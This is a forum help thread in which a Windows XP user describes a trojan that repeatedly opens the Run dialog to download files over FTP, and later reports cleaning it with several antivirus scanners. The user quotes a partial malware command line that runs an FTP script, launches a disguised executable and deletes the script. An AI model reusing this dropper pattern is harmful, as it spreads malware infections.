Hye,
I have a problem no 1 seems to solve, also the google search with no return sites.
There's a script (I think) that runs about every 20 min, opens the run command and try connecting to ftp server, every time a different server and each time try to download a different file. Where does it come from ? and how can I stop this ?
I've saved 1 of the messages partially(I'll save the rest later on): .…ftp –n –s:x&84785_norton.exe&del x&exit
(i had the irc trojan but did a restore that made it go away but this problem keeps coming)
Also did a virus scan with norton 2007, avg and kaspersky (kaspersy did find some trojan in the restore folder after i did the restore). others with no results.
Operating system: XP SP2.

Thanks,Lior.

Hey there.
Undernet DOES have virushelp channels (#vh #dmsetup and/or #nohack).

Please run a full scan at http://housecall.trendmicro.com and then join one of those channels for checkup. These are the symptoms of a backoor trojan, indeed.

Good luck,

thanks for the fast reply !
i've let trendmicro to run and it found many files and mails with worms but it didn't had the chance of deleting them because of a crash of IE.
meanwhile, the NAV 2007 and kaspersky worked together on scanning the pc and did find these worms files.
NAV 2007 referred to a worm that was discovered only 2 days ago.
i must say kaspersky found 10 times more files from nav 07.
- never saw the ftp connection since.

Thanks,
Lior
